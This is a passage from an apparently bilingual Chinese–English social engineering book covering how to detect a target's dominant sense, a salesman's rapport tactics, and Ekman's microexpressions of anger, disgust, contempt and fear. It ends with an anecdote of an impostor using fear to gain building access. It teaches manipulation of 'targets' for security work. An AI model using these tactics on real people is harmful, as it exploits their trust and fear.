Understanding these basic principles can go a long way toward being able to quickly discern the type of person you are talking to. Again, without asking the target to picture his morning rituals how can you discern the dominant sense? Even more so, why is this so important?

 

辨别主导意义

Discerning the Dominant Sense

 

确定某人主导意识的关键是尝试自我介绍,开始一段简短的对话,并密切注意对方所说的内容。当你走向目标并倾身说早上好时,也许她几乎不看你。她可能很粗鲁,或者她可能不是视觉型人。视觉型人需要看着说话的人才能正常交流,所以这种行为似乎表明她不是视觉型人。现在问一个简单的问题,例如“你不喜欢今天这样美好的一天吗?”并注意她的反应,特别是她是否看起来心情愉悦。

The key to determining someone’s dominant sense is to try to introduce yourself, start a small conversation, and pay close attention to what is being said. As you walk up to the target and lean in to say good morning, maybe she barely looks at you. She might be rude, or she just may not be a visual. Visuals need to look at the person speaking to communicate properly, so this behavior would seem to lend to  the fact she is not visual. Now ask a simple question such as, “Don’t you just love the feel of a beautiful day like today?” and notice her response, particularly whether she seems to light up or not.

 

也许你戴着一枚大大的、闪闪发亮的银戒指。你说话时会做出手势;也许你看到戒指吸引了她的眼球。她会伸出手去,感兴趣,需要拿着戒指或靠近观察它吗?当涉及到这些事情时,动觉是非常敏感的。我认识一个动觉很强的女人,当她看到某样她认为柔软或高品质的东西时,她一定会触摸它。她会说:“哇,那件毛衣看起来好柔软!”从这句话中,人们可能会认为她是一个视觉型的人,但接下来发生的事情巩固了这一观点。然后她走到那个人面前,触摸毛衣并感受它。这表明她的主要感觉是动觉。同样的女人在杂货店购物时,必须触摸所有东西,无论她是否需要。通过触摸物品,她建立了联系,这种联系使它对她来说变得真实。她常常记不住没有身体接触的东西。

Maybe you wear a large, shiny silver ring. As you talk you gesture; maybe you see that the ring catches her eye. Does she reach out, interested, and need to hold the ring or get close to observe it? Kinesthetics are very touchy-feely when it comes to these things. I know a woman who is a strong kinesthetic and when she sees something she thinks is soft or high quality she must touch it. She will say, “Wow, that sweater looks so soft!” From that statement one might assume she is a visual, but what happens next is what solidifies it. She then walks up to the person and touches the sweater and feels it. This shows her dominant sense is kinesthetic. The same woman must touch everything in the grocery store when she shops, whether she needs it or not. By touching the objects, she makes a connection and that connection makes it real to her. Often she cannot remember things very well that she did not come into physical contact with.

 

通过询问包含一些关键主导词的问题、观察目标的反应和倾听,可以揭示他或她使用的主导感官。倾听诸如看、看、明亮、黑暗之类的关键词,可以让你把目标当成视觉对象。如前所述,这不是一门精确的科学。没有一条一般规则说,如果一个人说“我明白你在说什么……”,那么他就一定是视觉对象。每个线索都应该引导你用更多的问题或陈述来验证你的直觉。一句警告:与以不同于他们思考方式的人交谈可能会让一些人感到恼火。用问题来判断一个人的思维方式可能会令人反感。谨慎使用问题,更多地依靠观察。

Asking questions that contain some of the key dominant words, observing a target’s reactions, and listening can reveal what dominant sense he or she uses. Listening for key words such as see, look, bright, dark can lead you to treat a target like a visual. As mentioned earlier this is not an exact science. There isn’t a general rule that states if a person says, “I can see what you are saying…” then he is always a visual. Each clue should lead you down the path toward verifying your hunch with more questions or statements. One word of caution: talking to someone in a different mode than they think in can be irritating to some. Using questions to determine a person’s mode of thinking can be off-putting. Use questions sparingly and rely more on observation.

 

为什么理解模式很重要

Why Understanding the Mode Is Important

 

我曾经和一个叫托尼的人一起工作过,他能把一杯水卖给一个快要溺水的人。托尼坚信,在销售中,要寻找并利用一个人的主导意识。他使用过几种方法,你可以从中学习。当他第一次接触目标时,他会拿着一支闪闪发光的银色和金色的笔。他会做很多手势,观察对方的眼睛是否跟着笔走;如果她稍微跟着,托尼就会不断地把手势放大,看看她的眼睛是否跟着走。如果这在最初几秒钟内似乎不起作用,他就会把笔打开再合上。这不是一个很大的声音,但足够大,打断一个想法,如果她是一个听觉者,就会引起她的注意。如果他认为这有效,他会在每次有重要想法时点击它,让目标对声音和所说的内容产生心理反应。如果这似乎不起作用,他会伸出手拍打桌子,轻拍她的手腕或前臂,或者如果他离她足够近的话,触摸她的肩膀。他并没有过度触摸,但足以看出她是否会回避或因触摸而显得过度高兴或不安。

I once worked with a guy, Tony, who could sell a cup of water to a drowning man. Tony was a big believer in seeking out and then using a person’s dominant sense in sales. He had a few methods that he used that you may learn from. When he first engaged the target he had a very shiny silver-and-gold pen he would hold in his hand. He would gesture a lot and notice whether the person followed the pen with her eyes; if she did slightly Tony would continually make the gestures bigger to see whether her eyes followed. If that didn’t seem to work in the first few seconds he would click the pen open and closed. It wasn’t a loud noise, but loud enough to disrupt a thought and draw someone’s attention if she were an auditory. If he thought that was working he would click it with every important thought, causing the target to have a psychological reaction to the sound and what was being said. If that didn’t seem to work he would reach out over the table and tap her wrist or forearm, or if he was close enough touch her shoulder. He didn’t touch excessively, but enough to see whether she would shy away or seemed overly happy or disturbed by the touch.

 

凭借这些微妙的方法,他可以快速辨别出对方最有可能的主导意识是什么。整个过程不到 60 秒。找到所需信息后,他就会开始将谈话转向主导意识,甚至在讲话的措辞、行为和对谈话的反应中融入这种意识的特征。托尼的一点是,他比我见过的任何人都卖力。人们经常这样评价他:“他好像知道我需要什么。”

With these subtle methods he could quickly discern what the person’s dominant sense most likely was. This whole act would take under 60 seconds. After he found the information he was looking for, he would then start to move his conversation to that dominant sense, even taking on the traits of that sense in the words he spoke and way he acted and reacted to the conversation. One thing about Tony is that he outsold any person I have ever met. People would often say about him, “It is like he knew exactly what I needed.”

 

托尼会和对方交谈,并以对方希望被交谈的方式对待对方。如果对方是视觉思维者,托尼会使用这样的短语:“你明白我在说什么吗?”或“你觉得这个怎么样?”他会使用涉及“看到”事物或可视化场景的插图。他会把人们放在他们的舒适区。

Tony would talk to the person and treat the person the way they wanted to be talked to. If the person was a visual thinker, Tony would use phrases like “Can you see what I am saying?” or “How does this look to you?” He would use illustrations that involved “seeing” things or visualizing scenarios. He would put people in their comfort zone.

 

当人们处于舒适区时,他们会感到安心。作为一名社会工程师,你能做的越多,让人们处于舒适区,你成功的机会就越大。人们倾向于那些让他们感到舒服的人;这是人性。例如,如果有人让你感到“温暖和舒适”,或者似乎理解你在说什么,或者似乎明白你的出发点,你就会很容易向这个人敞开心扉,信任他,并让他进入你的圈子。

People feel at ease when they are in their comfort zone. The more you can do as a social engineer to put people in their comfort zone, the better chance you have at success. People gravitate towards those with whom they are comfortable; it is human nature. For example, if someone makes you feel “warm and fuzzy,” or seems to understand what you are saying, or seems to see where you are coming from, you easily open up to, trust, and let that person in your circle.

 

我想重申这一点:找到并利用某人的主导意识并不是一门精确的科学。社会工程师应该将其作为武器库中的一种工具,而不是将其视为某种神奇或科学的东西。人性的某些心理方面是基于已证实的科学,可以依靠的。事实上,其中一些方面令人印象深刻,以至于它们可以让你看起来像一个读心者。其中一些一直是严肃辩论的话题,有些多年来一直被心理学家、执法部门和社会工程师所接受。本章的下一节将从微表情开始讨论这些内容。

I want to reiterate this point: finding and using someone’s dominant sense is not an exact science. A social engineer should use it as a tool in the arsenal and not rely on it as something magical or scientific. Certain psychological aspects of human nature are based on proven science and can be relied upon. As a matter of fact, some of these aspects are so impressive that they can make you seem like a mind reader. Some of them have been a topic of serious debate and some accepted by psychologists, law enforcement, and social engineers for years. The next section of this chapter discusses these, starting with microexpressions.

 

微表情

Microexpressions

 

您可能熟悉阅读面部表情的概念。当某人高兴、悲伤、愤怒或其他情绪时,您可以观察其面部表情并了解其情绪。如果有人试图假装这种表情,比如假笑,该怎么办?我们都做过这样的事情,走过市场时遇到一个我们不太喜欢的人——我们会装出一丝“微笑”,然后说:“嘿,约翰,很高兴见到你。向莎莉问好。”

You are probably familiar with the idea of reading facial expressions. When someone is happy, sad, angry, or whatever, when someone feels it you can look at his or her face and see that emotion. What if someone tries to fake that expression, like a fake smile? We have all done it, walking through the market and bumping into someone we just don’t like that much—we put on a “smile” and say, “Hey John, nice to see you. Say hi to Sally.”

 

我们可能表现得非常愉快和热情,但内心却只有愤怒。我们脸上长时间表现出的表情称为大表情,通常更容易让人看出所传达的情绪。与微表情类似,大表情受情绪控制,但不是无意识的,而且通常可以伪装。

We may act very pleasant and cordial, but inside we are feeling nothing but irritation. The expressions that we show for longer periods of time on our face are called macroexpressions and are generally easier for people to see the emotion that is being conveyed. Similar to microexpressions, macroexpressions are controlled by our emotions, but are not involuntary and often can be faked.

 

一些研究人类行为的先驱花了几十年的时间研究“微表情”,以了解人类如何传递情绪。

A certain few pioneers into the study of human behavior have spent decades researching something, coined microexpressions, to understand how humans relay emotions.

 

微表情是一种不易控制的表情,是情绪反应的结果。情绪会触发面部肌肉的某些反应,而这些反应会导致出现某些表情。很多时候,这些表情持续时间只有二十五分之一秒。由于它们是情绪反应导致的不自主肌肉运动,因此几乎无法控制。

Microexpressions are expressions that are not easily controllable and occur in reaction to emotions. An emotion triggers certain muscular reactions in a face and those reactions cause certain expressions to appear. Many times these expressions last for as short as one-twenty-fifth of a second. Because they are involuntary muscular movements due to an emotional response, they are nearly impossible to control.

 

这个定义也不是一个新的理解;查尔斯·达尔文在 1872 年写了一本书,名为《人类和动物的情绪表达》。在这本书中,达尔文指出了面部表情的普遍性以及肌肉在面部表情中的使用方式。

This definition is not a new understanding either; Charles Darwin wrote a book in 1872 called, The Expression of the Emotions in Man and Animals. In this book Darwin noted the universal nature of facial expressions and how muscles were used in facial expressions.

 

20 世纪 60 年代初,两位研究人员哈加德和艾萨克斯首次发现了如今所谓的微表情。1966 年,哈加德和艾萨克斯在题为《微瞬间面部表情作为心理治疗中自我机制的指标》的出版物中概述了他们如何发现这些“微瞬间”表情。

In the early 1960s two researchers, Haggard and Isaacs, first discovered what today is called microexpressions. In 1966, Haggard and Isaacs outlined how they discovered these “micromomentary” expressions in their publication titled, Micromomentary Facial Expressions as Indicators of Ego Mechanisms in Psychotherapy.

 

同样是在 20 世纪 60 年代,威廉·康登 (William Condon) 是一位先驱者,他通过逐帧研究了数小时的录像带,发现人类有“微动作”。他还深入研究了神经语言编程 (稍后会详细介绍) 和肢体语言。

Also in the 1960s, William Condon, a pioneer who studied hours of tapes frame by frame, discovered that humans had “micro-movements.” He also heavily researched neurolinguistic programming (more on that later) and body language.

 

保罗·埃克曼博士可能是微表情领域最具影响力的研究人员之一。埃克曼博士率先将微表情研究发展成为如今的科学。埃克曼博士研究微表情已有 40 多年,曾获得研究科学家奖,并于 2009 年被《时代》杂志评为全球最具影响力的人物之一。

Probably one of the most influential researchers in the field of microexpressions is Dr. Paul Ekman. Dr. Ekman pioneered microexpressions into the science it is today. Dr. Ekman has been studying microexpressions for more than 40 years, receiving the Research Scientist Award as well as being labeled one of Time Magazine’s most influential people on earth in 2009.

 

埃克曼博士与心理学家西尔万·汤姆金斯一起研究了面部表情。他的研究表明,与普遍的看法相反,情绪并不是由文化决定的,而是跨文化和生物普遍存在的。

Dr. Ekman researched facial expressions with psychologist Silvan Tomkins. His research revealed that, contrary to popular belief, emotions are not culturally determined, but are universal across cultures and biological.

 

他与莫琳·奥沙利文博士合作开发了一个名为“巫师计划”的项目他率先将微表情用于测谎。他以来自各行各业和各种文化的 15,000 人为样本,发现在如此庞大的样本中,只有 50 人能够在未经训练的情况下识别谎言。

Working with Dr. Maureen O’Sullivan he developed a project called the Wizards Project. He began to pioneer the use of microexpressions in lie detection. He used a base of 15,000 people from all walks of life and all cultures and found out of that large number that only 50 had the ability to spot a deception without training.

 

20 世纪 70 年代,艾克曼博士开发了 FACS(面部动作编码系统),用于标记和编号每一种可以想象的人类表情。他的研究范围不仅包括面部表情,还包括整个身体如何参与欺骗。

In the 1970s Dr. Ekman developed FACS (Facial Action Coding System) to label and number each conceivable human expression. His work branched out to not only include facial expressions but also how the whole body was involved in deception.

 

到 1972 年,艾克曼博士确定了一系列与基本情绪或生物学普遍情绪相关的表情:

By 1972, Dr. Ekman had identified a list of expressions that were linked with basic or biologically universal emotions:

 
 
     
  • 愤怒
  • Anger
  •  
     
  • 厌恶
  • Disgust
  •  
     
  • 害怕
  • Fear
  •  
     
  • 喜悦
  • Joy
  •  
     
  • 悲伤
  • Sadness
  •  
     
  • 惊喜
  • Surprise
  •  
 

埃克曼博士的研究成果开始受到追捧,许多执法机构和企业开始利用这项研究来检测谎言。1990 年,在一篇题为“基本情绪”的论文中,埃克曼博士修改了他的原始列表,将一系列积极和消极情绪纳入其中(www.paulekman.com/wp-content/uploads/2009/02/Basic-Emotions.pdf)。埃克曼博士出版了许多关于情绪、面部表情和测谎的书籍,这些书籍可以帮助每个人了解解读面部表情的价值。

Dr. Ekman’s work began to take on a following, and many law enforcement and corporate environments began to use this research in detecting deception. In 1990, in a paper entitled “Basic Emotions,” Dr. Ekman revised his original list to include a range of positive and negative emotions (www.paulekman.com/wp-content/uploads/2009/02/Basic-Emotions.pdf). Dr. Ekman has published many books on emotions, facial expressions, and lie detection that can help each person to understand the value in being able to decode facial expressions.

 

这段简短的历史表明,微表情这一主题并非幻想;相反,真正的医生、研究人员和人类行为领域的专业人士已经投入了无数时间来理解微表情。作为一名社会工程师,理解微表情可以在很大程度上保护你的客户并教会他们如何注意到微妙的欺骗暗示。

This brief history indicates that the subject of microexpressions is not some fantasy; on the contrary, real doctors, researchers, and professionals in the field of human behavior have put countless hours into understanding microexpressions. As a social engineer, understanding microexpressions can go a long way toward protecting your clients and teaching them how to notice subtle hints of deception.

 

如果您是一名社会工程师,或者只是对了解微表情感兴趣的人,我强烈建议您阅读 Ekman 博士的书籍,尤其是《情绪揭示》《揭开面部面具》。他确实是这个主题的权威。以下部分以简单的格式描述了微表情,以便您了解如何将其用作社会工程师。

If you are a social engineer, or just a person interested in learning about microexpressions, I strongly suggest reading Dr. Ekman’s books, especially Emotions Revealed and Unmasking the Face. He is truly the authority on this topic. The following sections describe the microexpressions in a simplistic format so you can see how you can use this later on as a social engineer.

 

如前所述,Ekman 博士列出了六种主要的微表情,后来又添加了蔑视,使微表情一共七种。以下部分将逐一介绍这些表情。

As mentioned earlier, Dr. Ekman labeled six main microexpressions and later on added contempt to the list, making seven. The following sections cover these one by one.

 

愤怒

Anger

 

愤怒通常比其他表情更容易被发现。愤怒时,嘴唇会变得紧绷。眉毛向下倾斜并挤在一起——然后是愤怒最明显的特征——怒视。

Anger is usually easier to spot than some other expressions. In anger the lips become narrow and tense. The eyebrows slant downward and are pushed together—then comes the most noticeable characteristic of anger, the glare.

 

愤怒是一种强烈的情绪,可以引发许多其他情绪。有时,当一个人对某事感到愤怒时,你会看到如图5-1所示的微表情。让人难以看清的是,面部动作可能只持续二十五分之一秒。

Anger is a strong emotion and can trigger many other emotions along with it. Sometimes when a person feels anger at something, what you see is a microexpression such as that shown in Figure 5-1. What makes it hard to see is that the facial movements may last only one-twenty-fifth of a second.

 

图 5-1:注意怒视、紧张的嘴唇和紧锁的眉头。

Figure 5-1: Notice the glare, tense lips and tightened brows.

 
f0501.tif

保罗·埃克曼博士

Dr. Paul Ekman

 
 

学会观察特定的微表情可以大大增强你对人的理解。为了学会如何做到这一点,Ekman 博士建议自己练习这种表情。他说,请按照以下步骤操作:

Learning to see a specific microexpression can greatly enhance your understanding of people. To learn how to do so, Dr. Ekman recommends practicing that expression on yourself. He says follow these steps:

 

1.将眉毛向下拉并拢;假装用眉毛内侧部分触碰鼻子。

2.眉毛向下时,尽量睁大眼睛,不要调整眉毛的位置。

3.紧紧抿住双唇。不要抿起嘴唇,只要绷紧嘴唇即可。

4.眩光。

1. Pull your eyebrows down and together; pretend you are trying to touch your nose with the inner parts of your eyebrows.

2. While your brows are down, try to open your eyes wide, without adjusting your brow position.

3. Press your lips together tight. Do not pucker your lips, just tense them together.

4. Glare.

 

你感受到了什么情绪?我第一次这样做的时候,怒不可遏。以下是本章的要点:

What emotion do you feel? The first time I did this, I was overwhelmed with anger. The following is a vital point to this chapter:

 

如果面部表情能够引起情绪,那一定意味着我们的面部运动能够影响我们所感受到的情绪,甚至可能影响我们周围人的情绪。

If producing the facial expression can cause the emotion, that must mean that our facial movements can affect the emotions we feel, and maybe even the emotions of those around us.

 

对着镜子练习这种情绪,直到你做到正确为止。图 5-2是一张年轻女子的照片,向我们展示了愤怒的具体表现方式。

Practice this emotion in a mirror until you get it right. Figure 5-2 shows a picture of a young woman showing us exactly how anger is displayed.

 

图 5-2:请留意她脸上明显愤怒的表情。

Figure 5-2: Notice the definite expression of anger on her face.

 
f0502.tif

最后的奇迹(尼基尔·甘加瓦内)| Dreamstime.com

Thefinalmiracle (Nikhil Gangavane) | Dreamstime.com

 
 

它与图 5-1中一样明显,冰冷的目光也暴露了这一点。

It is just as pronounced as in Figure 5-1 and the icy cold gaze gives it away too.

 

掌握重现微表情的能力将对理解微表情背后的情感大有帮助。当你能成功重现和解读微表情时,你就能理解导致这种表情的情感。此时,你就能了解与你打交道的人的心理状态。不仅能在自己身上重现微表情,还能在别人身上看到和读懂微表情,这有助于控制你的社交工程活动的结果。

Mastering the ability to reproduce microexpressions will go a long a way toward understanding the emotion behind them. When you can successfully reproduce and decode a microexpression, you can understand the emotion that is causing it. At that point you can understand the mental state of the person you are dealing with. Not only reproducing them on yourself but also being able to see and read them in others can be helpful in controlling the outcome of your social engineering engagements.

 

厌恶

Disgust

 

厌恶是一种强烈的情绪,通常是对你真正不喜欢的事物的反应。这种“事物”不一定是实物;它也可以是基于信仰或感觉的事物。

Disgust is a strong emotion usually in reaction to something you really do not like. This “something” does not always have to be a physical object; it can also be something that is based on a belief or feeling.

 

你真正讨厌的食物会引起厌恶的感觉,从而引发这种表情。令人惊奇的是,即使没有闻到或看到食物,想到它也会引起同样的情绪。

A food that you truly hate can cause the feeling of disgust, which will trigger this expression. What is amazing is even in the absence of the actual smell or sight of the food, the thought of it can cause the same emotion.

 

十几岁的时候,我和几个朋友去了迪斯尼乐园。我不是,真的不是过山车的粉丝。在多次劝说下,我去了室内过山车——太空山。玩了大概一半的时候,我决定我真的不介意坐过山车,突然间我身上沾满了湿湿的块状东西。然后我闻到了一种只能形容为胃内容物的气味。不仅是我,我身后的许多人也有同样的反应,可以说,我们谁也控制不住自己的午餐欲。不知不觉中,同时有人呕吐,溅到了明日世界交通局的玻璃上,这是一个缓慢移动的观景游乐设施,可以一窥太空山的部分旅程。令人惊奇的是,坐在明日世界游乐设施上慢慢绕着公园旋转的人们看到过山车后遗症在他们经过时击中玻璃,看到其他乘客身体不适,这让他们也呕吐了——但他们没有闻到气味,也没有与过山车乘客的呕吐物发生身体接触。为什么?

When I was a teenager, I went to Disney World with a few friends. I am not, and I mean not, a fan of roller coasters. After much prodding I went on Space Mountain, an indoor roller coaster. About halfway through I had determined that I really didn’t mind roller coasters when suddenly I was smeared with something very wet and chunky. I was then hit with an odor that I can only describe as stomach contents. Not only me, but many behind me had the same reaction and none of us could hold back our lunch, so to speak. Before you knew it, a simultaneous puking splattered the glass of the Tomorrowland Transit Authority, a slow-moving observation ride that offers a peek into the actual Space Mountain ride on part of its journey. What is amazing is that people in the Tomorrowland ride who sat there slowly going around the park saw the aftereffects hit the glass as they rode through, and saw all the other riders getting physically ill, which made them also vomit—yet they didn’t smell the odor or have physical contact with the puke from the roller coaster riders. Why?

 

厌恶。体液通常会引发厌恶的感觉,这也是为什么当你阅读本段时,你可能会开始表现出厌恶的表情。

Disgust. Bodily fluids generally bring on feelings of disgust and this is one reason that while reading this paragraph you probably started to exhibit the expressions of disgust.

 

厌恶的表现通常是上唇上扬露出牙齿,鼻子皱起。当鼻子皱起时,两颊也会抬起,仿佛是为了阻止恶臭或恶念进入自己的私人空间。

Disgust is often characterized by the upper lip being raised to expose the teeth, and a wrinkling of the nose. It may also result in both cheeks being raised when the nose is wrinkled up, as if to try to block the passage of the bad smell or thought into one’s personal space.

 

无论图 5-3中的男人刚刚看到了什么,它都引起了非常明显的厌恶。

What ever the man in Figure 5-3 just saw, it caused a very noticeable display of disgust.

 

图 5-3:皱起鼻子、扬起嘴唇,这是明显的厌恶表现。

Figure 5-3: Clear signs of disgust with a wrinkled nose and raised lip.

 
f0503.tif

© Mightyjohn | dreamstime.com

© Mightyjohn | dreamstime.com

 

根据艾克曼博士的研究,厌恶是人们看到、闻到甚至想到令人厌恶的事物时产生的反应之一。从社会工程学的角度来看,这种情绪可能不会让你走上成功之路,但它肯定能帮助你看清自己是否击中了目标,还是导致他或她在心理上拒绝接受你的想法。

Disgust is one of those emotions, according to Dr. Ekman’s research, that is in reaction to the sight, smell, or even thought of something distasteful. From a social engineering standpoint this emotion might not lead you down paths of success, but it can surely help you to see whether you are hitting the mark with your target or causing him or her to mentally shut down to your ideas.

 

如果你因为任何原因让目标感到厌恶,那么你很可能已经失败了。如果你的外表、气味、风格、呼吸或其他方面能让人感到厌恶,那么你很可能就会失去成功的大门。你必须清楚你的目标可以接受什么,不可以接受什么。例如,如果你的审计对象是一家知名律师事务所,而你身上有很多穿孔或纹身,那么你的目标可能会产生非常强烈的负面情绪,从而让你的社会工程尝试功亏一篑。如果你看到一个与图 5-4类似的面部表情,那么你就知道是时候离开现场了。

The odds are that if you cause disgust for any reason in your target, you have lost. If your appearance, smell, style, breath, or other aspect of your person can make a person feel disgust, then it will most likely close the door to success. You must be aware of what is acceptable and unacceptable to your targets. For example, if your audit is for a prestigious law firm and you have many piercings or tattoos, a very strong negative emotion may rise in your target, which can close the door to your social engineering attempt. If you see a facial expression similar at all to Figure 5-4 then you know it is time to leave the scene.

 

图 5-4:如果您看到这种表情,则表示出现了问题。

Figure 5-4: If you see this expression, something is wrong.

 
f0504.tif
 

在准备借口时,你必须认真考虑自己的外表。如果你恰好注意到你的目标身上有强烈的厌恶情绪,那么退缩并礼貌地找借口重新准备借口或寻找不同的方法可能是个好主意。

You must seriously consider your appearance when working on your pretext. If you happen to notice the strong negative emotion of disgust in your target, then backing down and politely excusing yourself to rework your pretext or find a different path in may be a good idea.

 

鄙视

Contempt

 

蔑视是一种非常强烈的情感,由于两者联系过于紧密,所以经常与厌恶混淆。艾克曼博士甚至没有将蔑视列入他的第一个基本情感清单中。

Contempt is a very strong emotion that is often confused with disgust because it is so closely linked. Dr. Ekman didn’t even include contempt on his first list of the base emotions.

 

在艾克曼博士的《情绪揭秘》一书中,他说:“蔑视只存在于对人或人的行为的体验中,而不会存在于对味觉、嗅觉或触觉的体验中。”然后他举了一个例子,吃牛脑,这个想法可能让你感到恶心,并会引发厌恶。然而,看到有人吃牛脑可能会引发对犯下这一行为的人的蔑视,而不是对行为本身的蔑视。

In Dr. Ekman’s book Emotions Revealed he says, “Contempt is only experienced about people or the actions of people, but not about tastes, smells, or touches.” He then gave an example of eating calf brains, which might be disgusting to you as a thought, and will trigger disgust. Yet seeing someone eating them may trigger contempt for the person committing the act, not the act itself.

 

蔑视针对的是人而不是物,这一事实对于理解伴随蔑视的微表情至关重要。能够看出你正在打交道的人是否感到蔑视可以帮助你更准确地找出他或她情绪的原因。

The fact that contempt is directed at a person rather than an object is crucial to understanding the microexpressions that go along with it. Being able to see whether the person you are dealing with is feeling contempt can help you to pinpoint more closely the reason for his or her emotion.

 

轻蔑的表情是皱鼻子和扬嘴唇,但只出现在脸的一侧,而厌恶的表情是扬起整个嘴唇并皱起整个鼻子。图 5-5中可以看到一种非常微妙的轻蔑表情,而图 5-6中显示的是一种更明显的轻蔑表情。

Contempt is distinguished by wrinkling the nose and raising the lip, but only on one side of the face, whereas disgust is the raising of the whole lip and the wrinkling of the whole nose. A very subtle contempt expression can be seen in Figure 5-5 whereas a more pronounced one is shown in Figure 5-6.

 

尝试模仿蔑视,如果你和我一样,你很快就会在心里感到愤怒和蔑视。做这个练习,看看这些反应如何影响你的情绪,这很有趣。

Try to mimic contempt, and if you are like me, you will quickly feel anger and contempt in your heart. Performing this exercise and seeing how these reactions affect you emotionally is interesting.

 

图 5-5:请注意 Ekman 博士鼻子上的轻微皱纹以及脸部右侧的凸起。

Figure 5-5: Notice the slight nose wrinkle and the raising of only the right side of Dr. Ekman’s face.

 
f0505.tif

保罗·埃克曼博士

Dr. Paul Ekman

 
 

图 5-6:请注意,在这张图片中蔑视的迹象更加明显。

Figure 5-6: Notice the signs of contempt are more prominent in this picture.

 
f0506.tif

保罗·埃克曼博士

Dr. Paul Ekman

 
 

蔑视往往伴随着愤怒,因为那些能让人产生蔑视的东西也会引发强烈的负面情绪。蔑视是一种你不想在与你打交道的人身上引发的情绪,尤其是在你参与社会工程活动时。

Contempt is often accompanied by anger, because the things that can cause contempt in a person can also trigger strong negative emotions. Contempt is one emotion you want to avoid triggering in anyone with whom you are dealing, especially if you are in a social engineering engagement.

 

害怕

Fear

 

恐惧常常与惊讶混淆,因为这两种情绪会导致面部肌肉做出类似的反应。最近在飞机上,我正准备写关于幸福的部分,但当时发生了一件奇妙的事情,促使我写下了关于恐惧的部分。

Fear is often confused with surprise because the two emotions cause similar muscular reactions in the face. Recently while on a plane, I was about to write the section on happiness, but something amazing happened at that time that served as the impetus for writing this section on fear instead.

 

我身高 6 英尺 3 英寸,不算矮,体格也不小。坐在飞机上,有几个小时可以打发,我想利用这段时间工作。我要补充一点,经济舱座位已经不像以前那样了。我坐在那里,打开笔记本电脑,茫然地发呆,思索着如何开始我打算写的部分。我很快意识到我应该开始写恐惧,因为我旁边的先生拿出一个水瓶,喝了一口,但我没有看到他把瓶盖盖上。我用眼角的余光看到他的水瓶从他手中掉落到我的键盘上。我当时的反应很容易就被认定为恐惧。

I am not a short man, being 6’3”, and not a small build, either. While I sat on the plane with a few hours to kill I thought I would take advantage of the time to work. Let me add that coach seats aren’t what they used to be. As I sat with my laptop open staring off into space I pondered how to start the section I had intended to write. I soon realized I was meant to start writing about fear, because the gentlemen next to me pulled out a water bottle and took a swig, but I didn’t see him recap the bottle. Out of the corner of my eye I saw his bottle falling from his hands and toward my keyboard. My instant reaction was easily identified as fear.

 

我的眼睛睁得大大的,眉毛向内皱在一起。我的嘴唇紧闭,向耳朵方向张开。当然,我当时并没有意识到这一切,但后来我能够分析发生了什么,我知道我感到害怕。然后我分析了我感觉到的面部表情,并确定如果我重复这个表情,我会再次感受到同样的情绪。我确信我看起来与图 5-7中看到的类似。

My eyes opened wide, while my eyebrows crunched together inward. My lips pulled together and out towards my ears. Of course, I didn’t realize all this as it was happening but afterward I was able to analyze what had happened and I knew I had felt fear. I then analyzed the way I felt my face move and determined that if I repeated the expression I felt that same emotion all over again. I am sure I looked similar to what is seen is Figure 5-7.

 

尝试按照以下步骤看看你是否能在自己身上产生这种情感:

Try to see whether you can generate this emotion in yourself by following these steps:

 

1.尽量抬高眉毛。

2.稍微张开嘴巴,并将嘴角向后拉。

3.如果可以的话,将眉毛拉在一起,同时尽量将其抬高。

1. Raise your eyebrows as high as they will go.

2. Drop your mouth open slightly and pull the corners of your lips back.

3. If you can, pull your eyebrows together while raising them as high as you can.

 

你当时感觉如何?你的手、手臂和腹部感觉如何?你有没有感觉到任何恐惧的迹象?如果没有,请再次尝试练习,但回想一下你处于无法控制的情况(类似于我乘坐飞机的经历,或者前面有一辆车突然停下来)。看看你当时的感觉。

How did you feel? How about in your hands and arms and your stomach? Did you notice any semblance of fear? If not, try the exercise again but think back to a time when you were in a situation (something similar to my plane experience, or a car in front of you screeching to a halt) out of your control. See how you feel then.

 

图 5-7:明显的恐惧迹象。

Figure 5-7: Clear signs of fear.

 
f0507.tif

保罗·埃克曼博士

Dr. Paul Ekman

 
 

您很可能也会有同样的感觉。我的一个朋友给我发了一张他女儿第一次坐过山车的照片(图 5-8)。您可以清楚地看到他眉毛上扬,眼睛睁大,嘴巴张开,嘴唇向后拉。

Most likely you will feel the emotion. A friend of mine sent me this picture of his daughter's first roller coaster ride (Figure 5-8). You can clearly see the raised eyebrows, eyes wide and the mouth open with lips pulled back.

 

从社会工程学的角度来看,恐惧通常被用来让人们做出某种反应。恶意的社会工程师使用恐惧策略来让毫无戒心的用户点击横幅或泄露有价值的信息。例如,恶意横幅可能会声称“您的计算机感染了病毒。点击此处立即修复!!”这些横幅针对的是那些害怕病毒的非技术用户,他们会点击这些横幅,但最终却被感染。

From a social engineering standpoint, fear is often used to cause people to react a certain way. Malicious social engineers use fear tactics to get an unsuspecting user to click a banner or give up a valuable piece of information. For example, malicious banners might claim “Your computer is infected with a virus. Click here to get fixed now!!” These banners work against non-technical users who fear the virus and will click, only to be infected at that point.

 

图5-8:这个小女孩在过山车上表现出明显的恐惧迹象。

Figure 5-8: This little girl is showing clear signs of fear on the roller coaster.

 
f0508.tif

查德·斯基德莫尔

Chad Skidmor

 
 

我曾工作过的一家公司就曾遭到一名恶意社交工程师的攻击,他利用恐吓手段进入大楼。这位社交工程师知道首席财务官正在外地参加一个重要的商务会议,不能被打扰,于是便以技术支持人员的身份进入公司。他要求进入首席财务官的办公室,但遭到了拒绝。然后他玩弄了这样一句话:“史密斯先生,你们的首席财务官,打电话给我,告诉我趁他不在开会时,我最好过来帮他解决电子邮件问题,如果他不在的时候不解决,就会被解雇。”

One company I worked with was hit by a malicious social engineer who used fear to gain access to the building. Knowing that the CFO was out of town on an important business meeting and could not be disturbed, the social engineer went into the company as a tech support guy. He demanded access to the CFO’s office, which was promptly denied. He then played this line, “Mr. Smith, your CFO, called me and told me that while he was away at this meeting I better come down and fix his e-mail problem and that if it is not fixed while he is gone, heads will roll.”

 

秘书担心,如果问题没有解决,她会受到指责。她的老板真的会生气吗?她的工作会受到威胁吗?由于担心出现负面结果,秘书让这个假技术支持人员进来了。如果他是一名熟练的社会工程师,他可能会观察她的面部表情,并注意她是否表现出与恐惧有关的担忧或焦虑的迹象。然后,他可能会越来越多地利用这些迹象,让她屈服于恐惧。

The secretary feared that if it didn’t get fixed, she would be to blame. Would her boss really be angry? Could her job be at risk? Because she feared a negative outcome, the secretary let the phony tech support guy in. If he was a skilled social engineer he may have been watching her facial expressions and noticing whether she exhibited signs of worry or anxiety, which are related to fear. He then could have played on these signs more and more, getting her to cave in to her fear.

 

恐惧可以成为你(或你的目标)去做许多通常不会考虑做的事情的巨大动力。

